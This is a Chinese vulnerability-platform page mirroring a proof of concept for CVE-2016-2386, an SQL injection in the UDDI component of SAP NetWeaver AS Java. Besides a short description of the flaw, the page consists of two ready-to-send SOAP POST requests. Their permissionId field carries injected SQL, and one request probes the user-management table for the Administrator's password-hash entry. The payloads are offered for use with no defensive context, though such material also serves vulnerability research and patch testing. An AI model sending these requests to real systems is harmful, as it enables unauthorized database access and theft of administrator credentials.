漏洞平台

POC详情： 4bf92177da1f45762d5b610c6fc57533a61e222a

来源

https://github.com/murataydemir/CVE-2016-2386

关联漏洞

标题： SAP NetWeaver J2EE Engine UDDI服务器SQL注入漏洞 (CVE-2016-2386)
描述：SAP NetWeaver J2EE Engine是德国思爱普（SAP）公司的一个面向服务的集成化应用平台的J2EE引擎。 SAP NetWeaver J2EE Engine 7.40版本的UDDI服务器中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意SQL命令。

描述

[CVE-2016-2386] SAP NetWeaver AS JAVA UDDI Component SQL Injection

介绍

<b>[CVE-2016-2386] SAP NetWeaver AS JAVA UDDI Component SQL Injection</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
```
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
    <soapenv:Header />
    <soapenv:Body>
        <sec:deletePermissionById>
            <permissionId>1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1</permissionId>
        </sec:deletePermissionById>
    </soapenv:Body>
</soapenv:Envelope>
```

```
POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sec="http://sap.com/esi/uddi/ejb/security/">
    <soapenv:Header />
    <soapenv:Body>
        <sec:deletePermissionById>
            <permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or '1'='1</permissionId>
        </sec:deletePermissionById>
    </soapenv:Body>
</soapenv:Envelope>
```

文件快照


 [4.0K]  /data/pocs/4bf92177da1f45762d5b610c6fc57533a61e222a
└── [1.6K]  README.md

0 directories, 1 file

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。